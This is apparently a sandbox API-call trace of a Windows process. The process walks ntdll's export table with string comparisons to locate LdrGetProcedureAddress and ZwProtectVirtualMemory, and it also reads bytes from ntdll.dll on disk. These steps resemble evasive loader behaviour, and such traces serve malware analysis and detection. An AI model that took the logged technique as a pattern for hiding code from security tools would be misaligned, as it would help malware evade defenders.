	[0070.484] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrClientCallServer", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="LdrGetProcedureAddress") returned -1
	[0070.484] lstrcmpA (lpString1="CsrGetProcessId", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgBreakPoint", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgPrint", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgPrintEx", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgPrompt", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1
	[0070.485] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrGetProcedureAddress") returned -1
	[0070.530] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="KiFastSystemCall", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="KiFastSystemCallRet", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="KiIntSystemCall", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrGetProcedureAddress") returned -1
	[0070.531] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1
	[0070.532] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrGetProcedureAddress") returned 0
	[0070.532] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1
	[0070.532] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230
	[0070.532] SetFilePointer (in: hFile=0x230, lDistanceToMove=996020, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf32b4
	[0070.532] ReadFile (in: hFile=0x230, lpBuffer=0x2d0fe0c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2d0fe10, lpOverlapped=0x0 | out: lpBuffer=0x2d0fe0c*, lpNumberOfBytesRead=0x2d0fe10*=0x4, lpOverlapped=0x0) returned 1
	[0070.532] CloseHandle (hObject=0x230) returned 1
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.532] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetLastError () returned 0x0
	[0070.533] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x771a08, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0070.533] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.533] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgPrint", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.534] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="KiFastSystemCall", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="KiFastSystemCallRet", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="KiIntSystemCall", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.535] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwProtectVirtualMemory") returned -1
	[0070.536] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwProtectVirtualMemory") returned -1
